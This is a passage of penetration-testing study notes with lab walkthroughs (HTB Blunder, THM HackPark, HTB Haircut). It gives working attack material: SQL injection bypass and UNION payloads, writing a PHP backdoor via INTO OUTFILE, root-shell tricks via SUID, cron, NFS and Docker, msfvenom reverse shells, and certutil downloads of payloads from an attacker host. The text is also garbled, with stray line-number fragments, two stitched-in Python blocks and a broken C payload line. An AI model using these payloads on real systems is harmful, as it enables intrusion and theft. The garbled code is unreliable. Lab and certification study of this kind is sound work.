The Cyber Mentor. (2023, January). Practical Ethical Hacking – 15 Hrs \[video]. YouTube. [https://www.youtube.com/watch?v=3FNYvj2U0HM&lc=UgwWx_P1fsJGXFhwLfd4AaABAg](https://www.youtube.com/watch?v=3FNYvj2U0HM&lc=UgwWx_P1fsJGXFhwLfd4AaABAg). (FREE!)

TCM Academy. Practical Network Penetration Tester. [https://certifications.tcm-sec.com/pnpt/](https://certifications.tcm-sec.com/pnpt/)

CompTIA. Multiple Certifications (Security+, Network+, Pentest+). [https://www.comptia.org/training/by-certification](https://www.comptia.org/training/by-certification)

Offensive Security. Fundamentals (100-level) and Multiple Certifications. [https://www.offsec.com/courses-and-certifications/](https://www.offsec.com/courses-and-certifications/)

SANS. Several Penetration Testing Courses (Offensive Operations Learning Path). [https://www.sans.org/cyber-security-skills-roadmap/?msc=main-nav](https://www.sans.org/cyber-security-skills-roadmap/?msc=main-nav)

TryHackMe. Jr. Penetration Tester and Offensive Pentesting Learning Paths. [https://tryhackme.com/hacktivities](https://tryhackme.com/hacktivities)

HacktheBox. Numerous Learning Paths Including Certified Penetration Testing Specialist. [https://academy.hackthebox.com/#pills-job-role-paths-tab](https://academy.hackthebox.com/#pills-job-role-paths-tab)

### Certifications

#### Entry Level

Certified Penetration Testing Certification (CPTS). [https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist](https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist)

Junior Penetration Tester (eJPT). [https://info.ine.com/ejpt/](https://info.ine.com/ejpt/)

GIAC Penetration Tester Certification (GPEN). [https://www.giac.org/certifications/penetration-tester-gpen/](https://www.giac.org/certifications/penetration-tester-gpen/)

Offensive Security Certified Professional (OSCP). [https://www.offsec.com/courses/pen-200/](https://www.offsec.com/courses/pen-200/)

CompTIA Pentest+. [https://www.comptia.org/certifications/pentest](https://www.comptia.org/certifications/pentest)

Practical Network Penetration Tester (PNPT). [https://certifications.tcm-sec.com/pnpt/](https://certifications.tcm-sec.com/pnpt/)

#### Intermediate

Certified Red Team Operator (CRTO). [https://training.zeropointsecurity.co.uk/courses/red-team-ops](https://training.zeropointsecurity.co.uk/courses/red-team-ops)

GIAC Exploit Researcher and Advanced Penetration Tester (GXPN). [https://www.giac.org/certifications/exploit-researcher-advanced-penetration-tester-gxpn/](https://www.giac.org/certifications/exploit-researcher-advanced-penetration-tester-gxpn/)

Offensive Security Experienced Pentester (OSEP). [https://www.offsec.com/courses/pen-300/](https://www.offsec.com/courses/pen-300/)

### Experience

HackTheBox. [https://www.hackthebox.com/](https://www.hackthebox.com/).

OSCP-Like Hack The Box Machines. [https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159)

Proving Grounds (Offsec). [https://www.offsec.com/labs/](https://www.offsec.com/labs/)

TryHackMe. [https://tryhackme.com](https://tryhackme.com).

--------------------------------------------------------------------------------
/4.-exploitation/web-application-attacks/sql-injection.md:

# SQL injection

SQL injection is a common vulnerability that enables attackers to inject commands and interact with databases. While typically exploited for data leakage, SQL injection vulnerabilities can also lead to server compromise.

#### Detection

The first step is to find input fields on the target site that likely interact with databases, such as login fields, search fields, message threads, etc. We can use a single quote (') to check for potential vulnerabilities. Ideally, this will cause an error and we'll receive an indication from the server.

#### Authentication bypass

In normal operation we expect a login form to query the database, something like:

```
select * from users where name = 'admin' and password = 'password123';
```

We can manipulate the input to change how the command is processed by the database:

```
admin' or 1=1;#
admin' or 1=1 LIMIT 1;#
```

Which results in query modification:

```
select * from users where name = 'admin' or 1=1;#' and password = 'password123';
```

The injected single quote closes the name string and the `#` comments out the remainder of the statement. If this causes errors, we can also request a fixed number of returns using the LIMIT statement.
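The bypass above, both the plain and the LIMIT variant, run against a small database beside the parameterised query that defeats it. Added Python example using sqlite3 so it runs offline; it is not code from these notes, and the `--` end-of-line comment is SQLite's spelling of the `#` used in the MySQL examples above. The table contents and helper names are constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (name text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "password123"), ("tom", "hunter2")])
    conn.commit()
    return conn


def build_login_query(name, password):
    """The vulnerable pattern: form fields pasted straight into the SQL string,
    which is exactly the 'query modification' the notes show."""
    return f"select * from users where name = '{name}' and password = '{password}';"


def login_vulnerable(conn, name, password):
    """Runs the concatenated query and returns the rows it matched. With the
    payload the quote closes the name literal and the comment swallows the
    password check, so the WHERE clause collapses to 'name = ... or 1=1'."""
    return conn.execute(build_login_query(name, password)).fetchall()


def login_safe(conn, name, password):
    """The fix: a parameterised query. The driver binds both values as data, so
    the quote and comment characters never reach the SQL parser as syntax and
    the payload is simply compared, verbatim, against the name column."""
    return conn.execute(
        "select * from users where name = ? and password = ?", (name, password)
    ).fetchall()


if __name__ == "__main__":
    conn = build_db()
    for payload in ("admin' or 1=1 -- ", "admin' or 1=1 LIMIT 1 -- "):
        print(build_login_query(payload, "wrong"))
        print("  vulnerable:", login_vulnerable(conn, payload, "wrong"))
        print("  safe      :", login_safe(conn, payload, "wrong"))
```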
```
select * from users where name = 'admin' or 1=1 LIMIT 1;#
```

To replicate in a web application, we submit the following payload into a username field:

```
tom' or 1=1 LIMIT 1;#
```

This should result in an authenticated session login.

#### Enumerating Databases

```
http://10.14.1.23/test.php?id=1' - begin testing with single quote
http://10.14.1.23/test.php?id=1 order by 1 - attempt to sort by first column
```

If this is successful and we receive a column name, we can continue to increase the number until we receive an error. This can be performed manually or automated in BurpSuite Repeater.

Next we can extract row information using the UNION statement.

```
http://10.14.1.23/test.php?id=1 union all select 1, 2, 3, 4
```

Depending on how the information is displayed, we can then modify our input to extract more information. In the following example we've identified that column three falls in a logical spot on the page.

```
http://10.14.1.23/test.php?id=1 union all select 1, 2, @@version
http://10.14.1.23/test.php?id=1 union all select 1, 2, user()
http://10.14.1.23/test.php?id=1 union all select 1, 2, table_name from information_schema.tables
http://10.14.1.23/test.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
http://10.14.1.23/test.php?id=1 union all select 1, username, password from users
```

#### Code Execution

In some cases we can use SQL injection to read/write system files and possibly write PHP onto the system for execution.

```
http://10.14.1.23/test.php?id=1 union all select 1, 2, load_file('C://Windows/System32/drivers/etc/hosts')
```

If this is successful we can attempt to create a malicious file on the server.

```
http://10.14.1.23/test.php?id=1 union all select 1, 2, "" into OUTFILE 'c:/xampp/htdocs/backdoor.php'
```

We may then be able to access the file with a command.

```
http://10.14.1.23/backdoor.php?cmd=id
```

If this succeeds, we can expand access by installing a full PHP shell on the server.

#### SQLmap

Tools such as SQLmap simplify the extraction of information from databases.

```
sqlmap -u http://10.14.1.23/test.php?id=1 -p "id"
sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" --dbms=mysql --dump
```

SQLmap also has numerous other features including firewall bypass and attempting to gain a shell on the target system.

```
sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" --dbms=mysql --os-shell
```

--------------------------------------------------------------------------------
/3.-enumeration/80-443-http-s.md:

# 80/443 - HTTP(s)

Web applications often contain vulnerabilities due to a large attack surface reliant on multiple technologies, dependencies and configuration challenges. Thorough enumeration is critical to ensure a complete understanding of the attack surface.

## Enumeration process

### 1. Manual review

* Set up a proxy interceptor (BurpSuite or ZAP) to passively audit
* Identify links, input fields, login pages, etc.
* Note version or software information
* Inspect the page source, look for version info, comments, etc.
* Inspect URLs for file extensions (php, jsp, do, html, etc.)
* Inspect URLs for possible bypass vulnerabilities
* Check for and review sitemaps/robots.txt/security.txt
* Check HTTP headers, observe how the web page and server exchange information

### 2. Scan for vulnerabilities

* Utilize scanning tools to crawl web pages and audit for vulnerabilities
* Manually review scan results

```
nikto -h 10.11.1.5
BurpSuite Pro active/live scan
ZAP active scan
Nessus web application scan
```

### 3. Identify underlying server technologies

* Web applications often utilize a number of underlying components that are typically outdated (examples: jQuery, Bootstrap, Telerik, etc.)
* Use [Nmap](../2.-scanning/port-scanning-with-nmap.md) to identify technologies operating on ports other than 80/443
* Attempt to identify:
  * Programming languages and frameworks
  * Web server software
  * Database software
  * Server operating system
* Default pages and configuration files will often be identified by vulnerability scanners or through scanning for open directories
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Tool with over 1,800 plugins designed to help identify website technologies.
* [Wappalyzer](https://www.wappalyzer.com/) - Website and plugin for recognizing website technologies.

### 4. Scan for open directories

Scanning for open directories is often called forced browsing. This technique uses a wordlist to search for unlinked directory and file names on the target.

Tools that automate this process should be configured to look for filetypes based on what you know about the web server.

```
Microsoft IIS - .asp or .aspx (+ html)
Apache - .php (+ html)
Tomcat - .war (+ html)
other - .pdf, .doc, .xls, .xlsx, .ppt, .pptx
```

#### Directory busting methodology (order of precedence)

```
.php OR .asp, .aspx AND .html AND .txt
.doc, .docx, .xls, .pdf
.webconfig, .config, .json, .yml, .env
.bk, .bak, .swp
.zip, .log
```

The following tools (and others) all have similar forced browsing functionality.

#### Dirsearch

```
python3 dirsearch.py -u http://10.10.87.202 -e html,asp,aspx -x 401,402,403

-e: extensions to include
-x: status codes to exclude
-f: forces the addition of extensions on every wordlist entry
-w: wordlist
```

#### Dirb

```
dirb $ipaddress
-X filetype : searches for specific files
```

#### ffuf

```
ffuf -w wordlist.txt -u http://somesite.com/FUZZ
ffuf -w wordlist.txt -u http://somesite.com/FUZZ -e .aspx,.html,.php,.txt
ffuf -w wordlist.txt -u http://somesite.com -H "Host: FUZZ.somesite.com"
```

#### BurpSuite

```
On 'Target' tab, right click target site --> Engagement tools --> Discover content
```

### 5. Finally, review and test interesting items

* Test input fields for XSS and SQL injection
* Test login forms for weak authentication, default/weak credentials, and SQL injection
* Test URL parameters for local/remote file inclusion
* Test URLs for directory traversal
* Review identified components for known vulnerabilities

## Testing SSL

#### Nmap scripting engine

```
nmap -p 443 --script=ssl-enum-ciphers www.somesite.org
```

#### SSLscan

```
sslscan IP_ADDRESS
```

#### Qualys SSL labs

{% embed url="https://www.ssllabs.com/ssltest/" %}

--------------------------------------------------------------------------------
/5.-maintaining-access/linux-privilege-escalation.md:

# Linux privilege escalation

## Manual enumeration

### User

```
whoami
id
history
```

### Other Users

```
cat /etc/passwd
who
```

### Privileges

```
sudo -l
cat /etc/sudoers
```

### File system

```
pwd (current location)
echo $PATH
```

### Hostname

```
hostname
```

### OS and architecture

```
cat /etc/issue
cat /etc/*-release
uname -a
lscpu
```

### Processes and services

```
ps aux
```

### Network

```
ifconfig OR ip a (interfaces)
route OR route l (routing table)
netstat -anp OR ss -anp (active connections)
arp -a
```

### Scheduled tasks

```
ls -lah /etc/cron* (contents of all cron files)
cat /etc/crontab (admins often add jobs here, usually run w/ root privs)
cat /var/log/cron.log (inspect for running cron jobs)
```

### Applications/patch levels/drivers/kernel modules

```
dpkg -l
lsmod (lists all kernel modules loaded)
/sbin/modinfo $modulename (more info on a specific kernel module, e.g. libata)
```

### Readable/writeable directories

```
find / -writable -type d 2>/dev/null
```

### Unmounted disks

```
mount
cat /etc/fstab (drives mounted at boot)
lsblk (all available disks)
```

### Sensitive files

```
history
cat /etc/passwd
cat /etc/shadow
cat /etc/group
```

### Passwords

Search the file system for passwords. Try additional search terms (pass, etc.).

```
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
```

### SSH keys

Search the filesystem for SSH keys. Public keys are typically stored in the "authorized\_keys" file, private keys are stored as "id\_rsa".

```
find / -name 'id_rsa*' 2> /dev/null
find / -name 'authorized_keys*' 2> /dev/null
```

## Automated tools

```
LinPeas.sh
LinEnum.sh
Linux Exploit Suggester
LinuxPrivChecker.py
```

## Exploitation paths

### SUID Files

SUID files allow individuals to execute files using the privileges of another user. They are identifiable by an "s" in the third character of the file's permission string (the owner's execute bit, e.g. `-rwsr-xr-x`). You can search manually with:

```
find / -perm -u=s -type f 2>/dev/null
```

If you identify a SUID file, check [GTFOBins](https://gtfobins.github.io/) for exploits.

### Capabilities

The exploitation of capabilities is similar to that of SUID files. Search for capabilities with:

```
getcap -r / 2>/dev/null
```

Look for "+ep" at the end of any returned items. If present, exploitation is possible.

### Execution

Run Python to escalate:

```
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

Other possibly exploitable capabilities include perl, tar, openssl (check [GTFOBins](https://gtfobins.github.io/)).

### Scheduled Tasks

```
cat /etc/cron*
cat /etc/crontab (admins often add jobs here, usually run w/ root privs)
cat /var/log/cron.log (inspect for running cron jobs)
systemctl list-timers --all
```

Columns represent minute, hour, day of month, month, day of week. An asterisk in a column means "all"; asterisks in all five columns mean the task runs every minute.

#### Exploitation

First, check the file type using the `file` command and whether or not you have write access. Sometimes replacing the file with one created on your attacking machine is easier than modifying the file that is in place. If so, rename the current file as \*.old and use wget to replace it with the version created on your attack machine.

```
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > script
# Wait for the job to execute, then
/tmp/bash -p
```

### NFS root squashing

Check `cat /etc/exports` for entries containing "no\_root\_squash", which indicates folders that are shareable and can be mounted. If available, remote commands are executed as root.
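The two configuration checks from the Scheduled Tasks section (the five crontab columns and which jobs run as root) and the NFS root squashing section (`no_root_squash` in `/etc/exports`) as a small audit script. Added Python example, not code from these notes; the sample crontab and exports files are constructed and the function names are hypothetical.

```python
import re

# Constructed sample files standing in for /etc/crontab and /etc/exports.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /home/user/backup.sh
@reboot www-data /var/www/cleanup.sh
"""
SAMPLE_EXPORTS = """\
# NFS exports
/tmp        *(rw,sync,no_root_squash)
/srv/share  10.0.0.0/24(ro,sync) 10.0.0.5(rw,sync)
"""

CRON_FIELDS = ("minute", "hour", "day_of_month", "month", "day_of_week")
_VAR_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def parse_crontab_line(line):
    """Parse one /etc/crontab entry: five schedule columns, the user, the command.
    Returns None for blank lines, comments and variable assignments; @-schedules
    (e.g. @reboot) come back with schedule={"special": "@reboot"}."""
    line = line.strip()
    if not line or line.startswith("#") or _VAR_ASSIGNMENT.match(line):
        return None
    if line.startswith("@"):
        parts = line.split(None, 2)
        if len(parts) < 3:
            return None
        return {"schedule": {"special": parts[0]}, "user": parts[1], "command": parts[2]}
    parts = line.split(None, 6)
    if len(parts) < 7:
        return None
    return {"schedule": dict(zip(CRON_FIELDS, parts[:5])), "user": parts[5], "command": parts[6]}


def describe_schedule(schedule):
    """Plain-English form of the column rule in the notes: '*' means 'all', and
    five asterisks mean the job runs every minute."""
    if "special" in schedule:
        return schedule["special"]
    if all(v == "*" for v in schedule.values()):
        return "every minute"
    return ", ".join(f"{k}={v}" for k, v in schedule.items() if v != "*")


def root_jobs(crontab_text):
    """Entries that run as root: the scripts whose ownership and write
    permissions deserve a check, since anyone who can edit them runs as root."""
    entries = (parse_crontab_line(raw) for raw in crontab_text.splitlines())
    return [e for e in entries if e and e["user"] == "root"]


def parse_exports(exports_text):
    """Yield (path, client, options) for every client spec in /etc/exports,
    e.g. '/tmp *(rw,sync,no_root_squash)' -> ('/tmp', '*', ['rw', ...])."""
    for line in exports_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            host, _, opts = client.rstrip(")").partition("(")
            yield path, host, [o for o in opts.split(",") if o]


def no_root_squash_exports(exports_text):
    """Exports on which a remote root keeps uid 0: the finding the notes describe."""
    return [(p, h) for p, h, o in parse_exports(exports_text) if "no_root_squash" in o]


if __name__ == "__main__":
    for job in root_jobs(SAMPLE_CRONTAB):
        print(f"root job [{describe_schedule(job['schedule'])}]: {job['command']}")
    for path, host in no_root_squash_exports(SAMPLE_EXPORTS):
        print(f"no_root_squash export: {path} to {host}")
```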
185 | 186 | #### Exploitation 187 | 188 | From the attacking machine: 189 | 190 | Search for mountable shares 191 | 192 | ``` 193 | showmount -e ipaddress 194 | ``` 195 | 196 | Create a new directory: 197 | 198 | ``` 199 | mkdir /tmp/mntme 200 | ``` 201 | 202 | Mount the folder: 203 | 204 | ``` 205 | mount -o rw, vers=2 ipaddress:/tmp /tmp/mountme 206 | ``` 207 | 208 | Create malicious file: 209 | 210 | ``` 211 | echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; /tmp/mountme/x.c 212 | ``` 213 | 214 | Compile the file: 215 | 216 | ``` 217 | gcc /tmp/mountme/x.c -o /tmp/mountme/x 218 | ``` 219 | 220 | Return to the victim machine, navigate to the target directory (/tmp), and execute the file 221 | 222 | ``` 223 | ./x 224 | ``` 225 | 226 | ### Docker 227 | 228 | If you are in the Docker group, check to see which containers are available: 229 | 230 | ``` 231 | docker image ls 232 | ``` 233 | 234 | Run the image: 235 | 236 | ``` 237 | docker run -v /:/mnt --rm -it alpine chroot /mnt sh 238 | ``` 239 | -------------------------------------------------------------------------------- /7.-walkthroughs/htb-blunder.md: -------------------------------------------------------------------------------- 1 | # HTB - Blunder 2 | 3 | ![](<../.gitbook/assets/image (1).png>) 4 | 5 | This writeup examines the Blunder machine from Hack the Box. This machine reinforces the value of deep enumeration and is great when preparing for various certification exams. 6 | 7 | ### Scanning and enumeration 8 | 9 | We start by scanning the machine with Nmap to identify open ports. Our scan reveals two ports: FTP on port 21 (closed), and an HTTP server operating on port 80. We immediately proceed to enumerating the web server; however, we also start a UDP scan to be sure that we aren’t missing any other possible attack vectors (update: no UDP ports open). 10 | 11 | Next, we manually view the page to look for information and check hyperlinks. 
The page is a simple blog that contains a few articles. The page also has a link for an “about” page, and the “created by” link in the footer leads to a Twitter profile.

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-18.png)

Next, we move on to scanning and directory busting. Nikto reveals the robots.txt and the presence of /admin/config.php. By navigating to the page we discover a ‘BLUDIT’ login page.

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-19.png)

A quick web search for BLUDIT suggests there is an RCE exploit available, but it requires login credentials. We’ll return to this later.

Basic credential guesses aren’t successful, so we continue with more thorough directory busting. Much like the Haircut machine, this machine reminds us of the importance of thorough directory busting. Running dirsearch a second time to search for txt and pdf files provides an additional clue: ‘/todo.txt’.

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-20.png)

Navigating to the document we learn that the root of the page (as suspected) is a CMS. The bottom note is also interesting, as it suggests a possible username beyond the seemingly unrelated Twitter page. With this information we may be able to brute force the login.

Brute forcing can be a bit of an art, but it’s always worthwhile to fully understand how the web page is sending login requests to the server. For this we use a proxy interceptor (Burp Suite, ZAP, etc.).

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-21.png)

Reviewing the request in Burp Suite we find that the login attempt is made via POST, but more importantly we identify that the request is accompanied by a CSRF token. After some experimentation it appears this CSRF token is used by BLUDIT to temporarily lock out accounts after 10 failed login attempts.
A quick Google search identified [this](https://rastating.github.io/bludit-brute-force-mitigation-bypass/) article, which includes a POC for bypassing this protection. The POC requires modification to import external wordlists; however, after a couple of attempts I had a working brute force tool that bypassed the lockout.

**Modified tool:** [https://github.com/sourtimez/Bludit-CMS-Brute-Force-Mitigation-Bypass](https://github.com/sourtimez/Bludit-CMS-Brute-Force-Mitigation-Bypass)

Despite the working tool, our brute force attempt is unsuccessful. Perhaps the answer is contained within the content of the CMS? To check, we use a tool called CeWL to generate a custom wordlist from the contents of the page. (\*\*IMO this is a bit unrealistic for a CMS with only three articles, but it may be useful for larger corporate websites, so there is still a valuable lesson to learn\*\*)

```bash
cewl -m 4 http://10.10.10.191 -w wordlist.txt
```

Using this wordlist we find a matching password.

### Establishing a foothold

Next, we return to the previously identified Bludit RCE located at [https://www.exploit-db.com/exploits/48701](https://www.exploit-db.com/exploits/48701).

To launch the exploit, we download and modify the necessary portions of the exploit code, paying careful attention to create the required .png and .htaccess files. After launching the exploit we receive confirmation of successful uploads.

Finally, we start a netcat listener to catch our shell and navigate to the target page (identified in the exploit code). Success, we have a shell!

### Privilege escalation

Our initial shell is somewhat limited and despite several attempts I am unable to upgrade it. Instead, I opt to configure a [better php reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) and upload it to /var/www/bludit-3.9.2/reverse.php with `wget`.
Navigating to the folder in our restricted shell confirms the upload was successful.

To launch the newly uploaded shell, start another netcat listener and navigate to the appropriate URL in the browser.

With a stable shell we can now upgrade to a TTY using Python and enable tab autocompletion.

```bash
python -c "import pty; pty.spawn('/bin/bash')"
```

Next, we move on to looking for privilege escalation opportunities. Nothing stands out from our basic search commands, so we upload and run [LinPeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS). Nothing stands out in our LinPeas scan either, so we continue with more in-depth manual enumeration. The following command searches for passwords and provides color-coded output of the results:

```bash
grep --color=always -rnw '/' -ie "PASSWORD" 2> /dev/null
```

Scrolling through the results (there are a lot!) we identify several hashes located in the Bludit directory. These hashes are present in the ‘users.php’ file for both installed versions of Bludit. Of note, /var/www/bludit-3.10.0a/bl-content/databases/users.php contains the following:

Entering the hash on [Crackstation.net](https://crackstation.net/) reveals that Hugo’s Bludit password is ‘**Password120**’. Fortunately, this user also reused this password, and we pivot to the account with `su hugo`. (There are also hashes for fergus and the admin user; however, there are no matches available in Crackstation for these additional hashes.)

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-28.png)

After recovering the user.txt flag from /home/hugo, we begin enumerating the account. `sudo -l` indicates some privileges, and through a quick Google search we find that the version of sudo installed on the target has an available PE exploit.
This exploit works by "tricking" sudo into executing /bin/bash as root with `sudo -u#-1 /bin/bash`. You can read more about this vulnerability [here](https://www.exploit-db.com/exploits/47502).

The root.txt flag is in the /root folder.
--------------------------------------------------------------------------------
/7.-walkthroughs/thm-hackpark.md:
--------------------------------------------------------------------------------
# THM - HackPark

![](<../.gitbook/assets/image (5).png>)

This walkthrough describes my approach to the 'Hackpark' room on TryHackMe. This room was more challenging than anticipated and required outside-the-box thinking to complete.

### **Scanning and enumeration**

As usual, I began this machine by executing an Nmap scan. My first attempt at scanning suggested the machine wasn't alive on the network, but adding -Pn to disable host discovery resolved the issue.

From the scan we see two open TCP ports: an IIS server on port 80 and what appears to be RDP operating on port 3389. We also see, from one of the default scripts executed with the '-sC' flag, that there is a web page titled 'hackpark' on the web server.

Opening the web page we're greeted by a familiar image, Pennywise. Further enumeration of the page provides two additional clues that might help us gain access to the page.

The page also includes an Archive, which may provide usernames. Further examination reveals that there is only one user, but it still might pay off. We identify two versions of the username that we'll save for later: 'Administrator' and 'Admin'.

### **Establishing a foothold**

Next, we turn our attention to the login page. Reviewing the page source (network tab) reveals that the page is using POST messages to complete login. Since we already have two possible usernames, we may be able to brute force the POST form with Hydra.
Setting up Hydra is fairly straightforward but requires additional information in order to brute force HTTP forms. The command should be formatted like the following:

```bash
hydra -l <username> -P <wordlist> <target ip> http-post-form "<login path>:<post body>:<failure string>"
```

First, we create a list of the usernames discovered during enumeration. This is accomplished by creating a .txt file using your editor of choice. Be sure to include variations of the names you found.

Next, we return to Firefox to gather the additional required information, using Firefox's built-in inspector tool.

1. Right click on the password field and select "Inspect Element".
2. Select the "Network" tab, then attempt a login to generate a POST request.
3. Select the POST request, then click the "Resend" dropdown and select "Edit and Resend" to view the request.
4. Capture the information contained in the "URL" and "Request Body" fields.
5. Add the information to the payload and be sure to replace the user and password fields with ^USER^ and ^PASS^. The final payload should look like the following:

```bash
hydra -L Documents/usernames.txt -P /usr/share/wordlists/rockyou.txt 10.10.123.151 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=TOBW8QB2Q1bJrd7T7HsS3fWFCIZpV%2BSQtzBYlIkaU4ByFOGGPbsPj4DSWfzE76ESPJ%2FAixlw2qczi60QSYlOlWbeDdJH%2FPD%2Bk28%2FSXg39HjUlbJh5osYPtt3g%2B28B26yy20WoJhmTf2C%2B7SJ4obtCMSaedImhrhNSKEr1d1rG1P%2BMc%2FV&__EVENTVALIDATION=qArfCXjRgc%2FupGmTQg94iY45Zhm%2FDcY6J2yn04JGA7L7UV1KeIx2EZV3EyAJ6GJ2cRKddbCCFFdcKOVHxxqpRr%2FBzvfkGKtcTSrby02Ac%2FnFBimu3PdUoge83U%2BLHPH%2BRuMIPDkCO2ASIW7SouDvT4NmgE6A%2Fe1I4fhXybvPHiWF3i1N&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
```

We execute the command and within a few moments Hydra provides two sets of credentials.
We are able to successfully log in to BlogEngine using the credentials and begin enumeration. Under ‘About’ we find that this particular blog utilizes BlogEngine version 3.3.6.0. A quick Google search reveals an [exploit](https://www.exploit-db.com/exploits/46353) for this version.

This exploit is fairly straightforward and simple to execute.

1. Download the exploit to the attacking machine.
2. Update the IP address to that of the attacking machine, and change the port (if desired).
3. Start a Netcat listener on the attacking machine to catch the incoming connection.
4. Return to BlogEngine and open the pre-existing post.
5. Select the File icon and upload the exploit. Be sure to rename the file as ‘PostView.ascx’ prior to upload.
6. Navigate to **http://10.10.49.8/?theme=../../App\_Data/files** (update IP accordingly). If you’ve done everything correctly the page will hang and you’ll receive a reverse shell.

### Privilege Escalation (no Metasploit)

Before we begin enumerating for privilege escalation we need to upgrade to a fully interactive shell. The `systeminfo` command reveals that the target is running Windows Server 2012 R2 Standard, 64-bit. To upgrade the shell, we first generate a payload with MSFVenom using the following command.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe
```

Next, upload the payload to the target. On Windows I prefer setting up a SimpleHTTPServer on the attacking machine and downloading the desired file(s) using certutil on the target.

```
certutil -urlcache -f http://attackerip/shell.exe shell.exe
```

After uploading the payload to the target, start another Netcat listener on the attacking machine. Run the payload on the target and you'll receive a fully interactive shell.

Now we can focus our attention on escalating our privileges.
We start by uploading [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS), again with the assistance of the SimpleHTTPServer and certutil.

Running WinPEAS provides comprehensive results, including several possible privilege escalation options. One that seems particularly interesting is a service called SystemScheduler. **(Note: I made several unsuccessful attempts to exploit the available autologon credentials before moving on to this service)**

Further examination of the SystemScheduler service suggests that it contains a privilege escalation [exploit](https://www.exploit-db.com/exploits/45072). Initial review of this exploit suggests it should work on this system; however, after several attempts it does not.

In fact, getting this exploit to work requires more enumeration. We know from WinPEAS that the service is present, and the service control command confirms that the service is running; however, the suggested service executable (wservice.exe) does not seem to be running on a schedule.

After a good bit of searching, I located the program's log files in C:\Program Files (x86)\SystemScheduler\Events. In the events directory is a file named '20198415519.INI\_LOG.txt'. Viewing this file reveals that a different executable (Message.exe) is running at :00 and :33 of every minute!

Now that we've identified the correct executable, exploitation is simple.

1. On the target machine, rename Message.exe to Message.bak.
2. Create a new payload with MSFVenom and name it Message.exe.
3. Start a Netcat listener on the attacking machine.
4. Upload the payload and wait for the program to run.
5. Root!

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > Message.exe
```

The flags are located on the jeff and Administrator desktops.
--------------------------------------------------------------------------------
/7.-walkthroughs/htb-haircut.md:
--------------------------------------------------------------------------------
# HTB - Haircut

![](<../.gitbook/assets/image (3).png>)

In this walkthrough we'll examine 'Haircut' from Hack The Box. This machine provides a number of useful lessons and I highly recommend working through this machine in preparation for the OSCP examination.

### Scanning and enumeration

As usual, begin by scanning the machine to identify open ports. My ‘go to’ scan is `nmap -p- -A $ipaddress`. The scan reveals that two ports are open: SSH on port 22 and an nginx web server operating on port 80.

Enumerating this box is fairly straightforward with only two open ports.

First, we briefly look at SSH. The SSH server does not permit anonymous logins and the version does not have any major vulnerabilities that may help us gain access.

Next, we turn our attention to the web server on port 80. Visiting the website in our browser takes us to a page containing an image. The source of the page does not provide any interesting information.

Scanning with Nikto reveals that the nginx server is outdated; however, a quick Google search does not yield any vulnerabilities for the installed version. Interestingly, Nikto also indicates the existence of a ‘/test.html’ page, which contains another seemingly dead end (for now).

Next, we turn our attention to fuzzing for additional directories on the web server. Our initial Dirsearch scan locates ‘/test.html’ and a redirect for an /uploads directory. Navigating to /uploads/ we receive a 403 error.

{% hint style="info" %}
This is where this machine provides a valuable lesson for new and developing pentesters.
Our enumeration to this point hasn’t provided any other clues, so we really only have two options: go back to see if we’ve missed anything, or use more intensive directory scans.
{% endhint %}

After a quick review of the Nmap scan, I opt to continue with more extensive fuzzing for hidden directories. I altered the original scan parameters to use the 'directory-list-2.3-medium.txt' wordlist, but received even fewer results. (This wordlist is included with Kali and can be found at /usr/share/wordlists/dirbuster/.)

Finally, I modified the scan again, this time using the -f option, which forces the specified extensions to be appended to every entry in the word list. I was previously unfamiliar with this option; however, in this instance it paid off, and the scan identifies the presence of "/exposed.php".

Navigating to the page we find a web form that allows user input. Selecting 'Go' without modifying the input field results in the display of the image we previously located at test.html. This suggests command execution is occurring. Time to examine this function using a web proxy interceptor.

After loading and configuring Burp Suite we execute and intercept the command. Analysis of the results reveals that the command is generating a POST message that is sent to the web server to retrieve 'test.html'.

We can now use Burp Suite's Repeater to modify the POST request and attempt to change the behavior of the web server. I first attempted to pass the 'id' command before the URL, but 'test.html' still loads. Next, I attempt with '\&id', and receive an error from the server. In the response message we see that curl is being used to transmit the request to the web server.

